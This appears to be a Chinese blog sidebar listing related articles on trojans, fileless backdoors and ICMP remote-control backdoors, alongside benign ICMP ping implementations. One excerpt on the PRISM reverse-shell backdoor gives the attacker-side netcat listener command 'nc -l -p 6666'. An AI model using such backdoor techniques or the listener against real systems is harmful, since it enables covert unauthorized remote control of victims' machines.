2195的专栏
08-31 1038
无进程DLL木马的又一开发思路与实现    无进程DLL木马的又一开发思路与实现     Author: TOo2y [原创]  E-mail: TOo2y@safechina.net  Homepage: www.safechina.net  Date: 11-3-2002     一.Windows下进程的隐藏  二.Windows Socket 2 S
Linux系统C++实现ICMP功能
12-16
此demon是C++代码实现Linux系统PING包功能,源码在压缩文件src文件夹下,示例为./aout 192.168.1.1 (或加次数)
无进程无启动项无硬盘文件运行程序的研究
M-先生
03-28 856
小弟新人,初来乍到看雪,看到无数大牛们的文章作品,总觉得自己也该写点什么,可惜手生技疏,怕是会让大牛们贻笑大方,于是迟迟不敢写出来。今天总算是鼓足勇气献丑,第一次发帖,牛牛们多多关照。      从前给人做东西的时候,无意中发现了网上byshell后门这玩意,号称“无进程无DLL无硬盘文件无启动项 ”,于是就试着山寨一个,以下个人愚见。      实现这种程序无非需要以下几种条件:
icmp后门的编写
liujiayu2的专栏
03-15 1891
1 关于icmp的介绍      ICMP 的全称为(Internet Control Message Protocal)。它是一种差错报告机制,可以被用来向目的主机报告或者请求各种网络信息。这些信息包括回送应答(ping),目的地不可达,源站抑制,回送请求,掩码请求和掩码应答,还有是路由跟踪等。这些信息是用ICMP数据报报头中一个字节长度的类型码来区别的。     ICMP协议有一个
Python3实现ICMP远控后门(中)之“嗅探”黑科技
七夜的博客
05-13 1361
ICMP后门 前言   第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇   在上两篇文章中,详细讲解了ICMP协议,同时实现了一个具备完整功能的ping工具,完整的代码发布在https://github.com/qiyeboy/LuLunZi/blob/master/NetWork/ping.py中。本次讲的是嗅探,为什么要讲...
Linux下的ICMP反弹后门:PRISM
J_linnb的博客
04-26 555
安装完解压后可以看到文件内容很简单,根据网站上的介绍可以得知它可以在Linux,Solaris,AIX,BSD/Mac,Android等多个系统运行。脚本发送包到后门主机,本地监听相关端口等待后门主机反弹连接(先开一个终端进行第一步监听,再开一个终端使用sendPacket.py脚本)使用此操作模式,后门在后台静默等待特定的 ICMP 数据包,该数据包包含要重新连接的主机/端口和防止第三方访问的私钥。比赛时遇到的这个基于ping的ICMP后门,看了很多大佬写的文章,自己决定试一下。交叉编译prism后门
基于Windows API下的ICMP协议通信C++实现
最新发布
m0_47666995的博客
02-25 481
最近正在开发一个网络质量检测工具,可实时检测网络质量并报告,开始的想法即是循环ping目标服务器,然后计算延迟及丢包率得出结果。因此需要基于C++实现ICMP的网络通信。
Python3实现ICMP远控后门(下)之“Boss”出场
七夜的博客
05-17 854
ICMP后门   前言   第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 第三篇:Python3实现ICMP远控后门(中)之“嗅探”黑科技   熬到最后一篇了,本系列的Boss要出场了,实现了一个有意思的ICMP后门,暂时使用pyinstaller打包成了一个win32和64版本,如下图所示。     在前几篇的基础上,本...
开源工具:ICMP后门项目地址
mingyqf的博客
02-19 909
Prism backdoor 棱镜后门 PRISM 是一个用户空间隐身反向 shell 后门。 代码可在 GitHub 。 它已经过全面测试: Linux 索拉里斯 艾克斯 BSD/Mac 安卓 PRISM 可以以两种不同的方式工作: ICMP 和 STATIC 模式。 ICMP 模式 使用此操作模式后门会在后台静默等待特定的 ICMP 数据包 包含要连接回来的主机/端口和防止第三方访问的私钥。 首先,在攻击者机器上运行 netcat 以等待来自后门的传入连接: $ nc -l -p 6666 使用 s
C++实现基于ICMP协议的ping命令
温暖不了你的心的博客
02-25 2338
前言 接上一篇,对ICMP的学习,用C++实现基于ICMP协议的ping工具,用来判断设备的在线状态。 代码 #define _WINSOCK_DEPRECATED_NO_WARNINGS #define _CRT_SECURE_NO_WARNINGS #include <iostream> #include <winsock2.h> #pragma comment(lib,"WS2_32") //链接到WS2_32.lib using namespace std; //
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值